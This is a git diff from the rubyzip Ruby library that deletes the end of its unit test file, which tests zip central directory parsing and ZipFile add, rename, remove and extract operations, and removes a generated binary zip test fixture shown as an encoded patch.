-  def assertIOErrorInClosedStream
-    assert_exception(IOError) {
-      zos = ZipOutputStream.new("test_putOnClosedStream.zip")
-      zos.close
-      yield zos
-    }
-  end
-
-  def writeTestZip(zos)
-    TEST_ZIP.entryNames.each {
-      |entryName|
-      zos.putNextEntry(entryName)
-      File.open(entryName, "rb") { |f| zos.write(f.read) }
-    }
-  end
-end
-
-
-
-module Enumerable
-  def compareEnumerables(otherEnumerable)
-    otherAsArray = otherEnumerable.to_a
-    index=0
-    each_with_index {
-      |element, index|
-      return false unless yield(element, otherAsArray[index])
-    }
-    return index+1 == otherAsArray.size
-  end
-end
-
-
-class ZipCentralDirectoryEntryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open("testDirectory.bin", "rb") {
-      |file|
-      entry = ZipEntry.readCDirEntry(file)
-      
-      assert_equals("longAscii.txt", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(106490, entry.size)
-      assert_equals(3784, entry.compressedSize)
-      assert_equals(0xfcd1799c, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("empty.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(0, entry.size)
-      assert_equals(0, entry.compressedSize)
-      assert_equals(0x0, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("short.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(6, entry.size)
-      assert_equals(6, entry.compressedSize)
-      assert_equals(0xbb76fe69, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("longBinary.bin", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(1000024, entry.size)
-      assert_equals(70847, entry.compressedSize)
-      assert_equals(0x10da7d59, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals(nil, entry)
-# Fields that are not check by this test:
-#          version made by                 2 bytes
-#          version needed to extract       2 bytes
-#          general purpose bit flag        2 bytes
-#          last mod file time              2 bytes
-#          last mod file date              2 bytes
-#          compressed size                 4 bytes
-#          uncompressed size               4 bytes
-#          disk number start               2 bytes
-#          internal file attributes        2 bytes
-#          external file attributes        4 bytes
-#          relative offset of local header 4 bytes
-
-#          file name (variable size)
-#          extra field (variable size)
-#          file comment (variable size)
-
-    }
-  end
-
-  def test_ReadEntryFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read(12) } # cdir entry header is at least 46 bytes
-    fragment.extend(IOizeString)
-    entry = ZipEntry.new
-    entry.readCDirEntry(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-end
-
-class ZipCentralDirectoryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open(TestZipFile::TEST_ZIP2.zipName, "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.readFromStream(zipFile)
-
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames.size, cdir.size)
-      assert(cdir.compareEnumerables(TestZipFile::TEST_ZIP2.entryNames) { 
-          |cdirEntry, testEntryName|
-          cdirEntry.name == testEntryName
-        })
-      assert_equals(TestZipFile::TEST_ZIP2.comment, cdir.comment)
-    }
-  end
-
-  def test_readFromInvalidStream
-    File.open("ziptest.rb", "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.new
-      cdir.readFromStream(zipFile)
-    }
-    fail "ZipError expected!"
-  rescue ZipError
-  end
-
-  def test_ReadFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read }
-    fragment.slice!(12) # removed part of first cdir entry. eocd structure still complete
-    fragment.extend(IOizeString)
-    entry = ZipCentralDirectory.new
-    entry.readFromStream(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeToStream
-    entries = [ ZipEntry.new("file.zip", "flimse", "myComment", "somethingExtra"),
-      ZipEntry.new("file.zip", "secondEntryName"),
-      ZipEntry.new("file.zip", "lastEntry.txt", "Has a comment too") ]
-    cdir = ZipCentralDirectory.new(entries, "my zip comment")
-    File.open("cdirtest.bin", "wb") { |f| cdir.writeToStream(f) }
-    cdirReadback = ZipCentralDirectory.new
-    File.open("cdirtest.bin", "rb") { |f| cdirReadback.readFromStream(f) }
-    
-    assert_equals(cdir.entries, cdirReadback.entries)
-  end
-
-  def test_equality
-    cdir1 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir2 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir3 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    cdir4 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    assert_equals(cdir1, cdir1)
-    assert_equals(cdir1, cdir2)
-
-    assert(cdir1 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir3 !=  cdir4)
-
-    assert(cdir3 !=  "hello")
-  end
-end
-
-
-class BasicZipFileTest < RUNIT::TestCase
-  include AssertEntry
-
-  def setup
-    @zipFile = ZipFile.new(TestZipFile::TEST_ZIP2.zipName)
-    @testEntryNameIndex=0
-  end
-
-  def nextTestEntryName
-    retVal=TestZipFile::TEST_ZIP2.entryNames[@testEntryNameIndex]
-    @testEntryNameIndex+=1
-    return retVal
-  end
-    
-  def test_entries
-    assert_equals(TestZipFile::TEST_ZIP2.entryNames, @zipFile.entries.map {|e| e.name} )
-  end
-
-  def test_each
-    @zipFile.each {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_foreach
-    ZipFile.foreach(TestZipFile::TEST_ZIP2.zipName) {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStream
-    @zipFile.each {
-      |entry|
-      assertEntry(nextTestEntryName, @zipFile.getInputStream(entry), 
-      entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStreamBlock
-    fileAndEntryName = @zipFile.entries.first.name
-    @zipFile.getInputStream(fileAndEntryName) {
-      |zis|
-      assertEntryContentsForStream(fileAndEntryName, 
-           zis, 
-           fileAndEntryName)
-    }
-  end
-end
-
-class CommonZipFileFixture < RUNIT::TestCase
-  include AssertEntry
-
-  EMPTY_FILENAME = "emptyZipFile.zip"
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "4entry_copy.zip"
-
-  def setup
-    File.delete(EMPTY_FILENAME) if File.exists?(EMPTY_FILENAME)
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-  end
-end
-
-class ZipFileTest < CommonZipFileFixture
-
-  def test_createFromScratch
-    comment  = "a short comment"
-
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.comment = comment
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals(comment, zfRead.comment)
-    assert_equals(0, zfRead.entries.length)
-  end
-
-  def test_add
-    srcFile   = "ziptest.rb"
-    entryName = "newEntryName.rb" 
-    assert(File.exists? srcFile)
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.add(entryName, srcFile)
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals("", zfRead.comment)
-    assert_equals(1, zfRead.entries.length)
-    assert_equals(entryName, zfRead.entries.first.name)
-    AssertEntry.assertContents(srcFile, 
-             zfRead.getInputStream(entryName) { |zis| zis.read })
-  end
-
-  def test_addExistingEntryName
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.add(zf.entries.first.name, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_addExistingEntryNameReplace
-    gotCalled = false
-    replacedEntry = nil
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      replacedEntry = zf.entries.first.name
-      zf.add(replacedEntry, "ziptest.rb") { gotCalled = true; true }
-    }
-    assert(gotCalled)
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assertContains(zf, replacedEntry, "ziptest.rb")
-    }
-  end
-
-  def test_addDirectory
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.add(TestFiles::EMPTY_TEST_DIR, TestFiles::EMPTY_TEST_DIR)
-    }
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      dirEntry = zf.entries.detect { |e| e.name == TestFiles::EMPTY_TEST_DIR+"/" } 
-      assert(dirEntry.isDirectory)
-    }
-  end
-
-  def test_remove
-    entryToRemove, *remainingEntries = TEST_ZIP.entryNames
-
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?(entryToRemove))
-    zf.remove(entryToRemove)
-    assert(! zf.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zf.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zfRead.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zfRead.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zfRead.close
-  end
-
-
-  def test_rename
-    entryToRename, *remainingEntries = TEST_ZIP.entryNames
-    
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?  entryToRename)
-    
-    newName = "changed name"
-    assert(! zf.entries.map { |e| e.name }.include?(newName))
-
-    zf.rename(entryToRename, newName)
-    assert(zf.entries.map { |e| e.name }.include?  newName)
-
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.map { |e| e.name }.include?  newName)
-    zfRead.close
-  end
-
-  def test_renameToExistingEntry
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.rename(zf.entries[0], zf.entries[1].name)
-      }
-    }
-
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameToExistingEntryOverwrite
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-    
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.rename(zf.entries[0], zf.entries[1].name) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    oldEntries.delete_at(0)
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, 
-        zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameNonEntry
-    nonEntry = "bogusEntry"
-    targetEntry = "targetEntryName"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zf.entries.include?(nonEntry))
-    assert_exception(ZipNoSuchEntryError) {
-      zf.rename(nonEntry, targetEntry)
-    }
-    zf.commit
-    assert(! zf.entries.include?(targetEntry))
-  ensure
-    zf.close
-  end
-
-  def test_renameEntryToExistingEntry
-    entry1, entry2, *remaining = TEST_ZIP.entryNames
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipEntryExistsError) {
-      zf.rename(entry1, entry2)
-    }
-  ensure 
-    zf.close
-  end
-
-  def test_replace
-    unchangedEntries = TEST_ZIP.entryNames.dup
-    entryToReplace = unchangedEntries.delete_at(2)
-    newEntrySrcFilename = "ziptest.rb" 
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    zf.replace(entryToReplace, newEntrySrcFilename)
-    
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    AssertEntry::assertContents(newEntrySrcFilename, 
-        zfRead.getInputStream(entryToReplace) { |is| is.read })
-    zfRead.close    
-  end
-
-  def test_replaceNonEntry
-    entryToReplace = "nonExistingEntryname"
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assert_exception(ZipNoSuchEntryError) {
-  zf.replace(entryToReplace, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_commit
-    newName = "renamedFirst"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    oldName = zf.entries.first
-    zf.rename(oldName, newName)
-    zf.commit
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.detect { |e| e.name == newName } != nil)
-    assert(zfRead.entries.detect { |e| e.name == oldName } == nil)
-    zfRead.close
-
-    zf.close
-  end
-
-  # This test tests that after commit, you
-  # can delete the file you used to add the entry to the zip file
-  # with
-  def test_commitUseZipEntry
-    File.copy(TestFiles::RANDOM_ASCII_FILE1, "okToDelete.txt")
-    zf = ZipFile.open(TEST_ZIP.zipName)
-    zf.add("okToDelete.txt", "okToDelete.txt")
-    assertContains(zf, "okToDelete.txt")
-    zf.commit
-    File.move("okToDelete.txt", "okToDeleteMoved.txt")
-    assertContains(zf, "okToDelete.txt", "okToDeleteMoved.txt")
-  end
-
-#  def test_close
-#    zf = ZipFile.new(TEST_ZIP.zipName)
-#    zf.close
-#    assert_exception(IOError) {
-#      zf.extract(TEST_ZIP.entryNames.first, "hullubullu")
-#    }
-#  end
-
-  def test_compound1
-    renamedName = "renamedName"
-    originalEntries = []
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-
-      assertNotContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-      zf.add(TestFiles::RANDOM_ASCII_FILE1, 
-       TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-
-      zf.rename(zf.entries[0], renamedName)
-      assertContains(zf, renamedName)
-
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, originalEntries.last.to_s)
-      zf.remove(originalEntries.last.to_s)
-      assertNotContains(zf, originalEntries.last.to_s)
-      
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      assertContains(zfRead, TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zfRead, renamedName)
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  assertContains(zfRead, filename)
-      }
-      assertNotContains(zfRead, originalEntries.last.to_s)
-    ensure
-      zfRead.close
-    end
-  end
-
-  def test_compound2
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-      
-      originalEntries.each {
-  |entry|
-  zf.remove(entry)
-  assertNotContains(zf, entry)
-      }
-      assert(zf.entries.empty?)
-      
-      TestFiles::ASCII_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-      assert_equals(zf.entries.map { |e| e.name }, TestFiles::ASCII_TEST_FILES)
-      
-      zf.rename(TestFiles::ASCII_TEST_FILES[0], "newName")
-      assertNotContains(zf, TestFiles::ASCII_TEST_FILES[0])
-      assertContains(zf, "newName")
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      asciiTestFiles = TestFiles::ASCII_TEST_FILES.dup
-      asciiTestFiles.shift
-      asciiTestFiles.each {
-  |filename|
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, "newName")
-    ensure
-      zfRead.close
-    end
-  end
-
-  private
-  def assertContains(zf, entryName, filename = entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} != nil, "entry #{entryName} not in #{zf.entries.join(', ')} in zip file #{zf}")
-    assertEntryContents(zf, entryName, filename) if File.exists?(filename)
-  end
-  
-  def assertNotContains(zf, entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} == nil, "entry #{entryName} in #{zf.entries.join(', ')} in zip file #{zf}")
-  end
-end
-
-class ZipFileExtractTest < CommonZipFileFixture
-  EXTRACTED_FILENAME = "extEntry"
-  ENTRY_TO_EXTRACT, *REMAINING_ENTRIES = TEST_ZIP.entryNames.reverse
-
-  def setup
-    super
-    File.delete(EXTRACTED_FILENAME) if File.exists?(EXTRACTED_FILENAME)
-  end
-
-  def test_extract
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(ENTRY_TO_EXTRACT, EXTRACTED_FILENAME)
-      
-      assert(File.exists? EXTRACTED_FILENAME)
-      AssertEntry::assertContents(EXTRACTED_FILENAME, 
-          zf.getInputStream(ENTRY_TO_EXTRACT) { |is| is.read })
-    }
-  end
-
-  def test_extractExists
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    assert_exception(ZipDestinationFileExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) { 
-  |zf| 
-  zf.extract(zf.entries.first, EXTRACTED_FILENAME) 
-      }
-    }
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert_equals(writtenText, f.read)
-    }
-  end
-
-  def test_extractExistsOverwrite
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(zf.entries.first, EXTRACTED_FILENAME) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert(writtenText != f.read)
-    }
-  end
-
-  def test_extractNonEntry
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipNoSuchEntryError) { zf.extract("nonExistingEntry", "nonExistingEntry") }
-  ensure
-    zf.close if zf
-  end
-
-  def test_extractNonEntry2
-    outFile = "outfile"
-    assert_exception(ZipNoSuchEntryError) {
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      nonEntry = "hotdog-diddelidoo"
-      assert(! zf.entries.include?(nonEntry))
-      zf.extract(nonEntry, outFile)
-      zf.close
-    }
-    assert(! File.exists?(outFile))
-  end
-
-end
-
-class ZipFileExtractDirectoryTest < CommonZipFileFixture
-  TEST_OUT_NAME = "emptyOutDir"
-
-  def openZip(&aProc)
-    assert(aProc != nil)
-    ZipFile.open(TestZipFile::TEST_ZIP4.zipName, &aProc)
-  end
-
-  def extractTestDir(&aProc)
-    openZip {
-      |zf|
-      zf.extract(TestFiles::EMPTY_TEST_DIR, TEST_OUT_NAME, &aProc)
-    }
-  end
-
-  def setup
-    super
-
-    Dir.rmdir(TEST_OUT_NAME)   if File.directory? TEST_OUT_NAME
-    File.delete(TEST_OUT_NAME) if File.exists?    TEST_OUT_NAME
-  end
-    
-  def test_extractDirectory
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-  
-  def test_extractDirectoryExistsAsDir
-    Dir.mkdir TEST_OUT_NAME
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-
-  def test_extractDirectoryExistsAsFile
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    assert_exception(ZipDestinationFileExistsError) { extractTestDir }
-  end
-
-  def test_extractDirectoryExistsAsFileOverwrite
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    gotCalled = false
-    extractTestDir { 
-      |entry, destPath| 
-      gotCalled = true
-      assert_equals(TEST_OUT_NAME, destPath)
-      assert(entry.isDirectory)
-      true
-    }
-    assert(gotCalled)
-    assert(File.directory? TEST_OUT_NAME)
-  end
-end
-
-
-TestFiles::createTestFiles(ARGV.index("recreate") != nil || 
-         ARGV.index("recreateonly") != nil)
-TestZipFile::createTestZips(ARGV.index("recreate") != nil || 
-          ARGV.index("recreateonly") != nil)
-exit if ARGV.index("recreateonly") != nil
-
-#require 'runit/cui/testrunner'
-#RUNIT::CUI::TestRunner.run(ZipFileTest.suite)
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/test/data/generated/5entry.zip b/lib/zip/test/data/generated/5entry.zip
deleted file mode 100644
index ef580052eda47f14c1b7e22abff82188c5e66386..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 54114
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
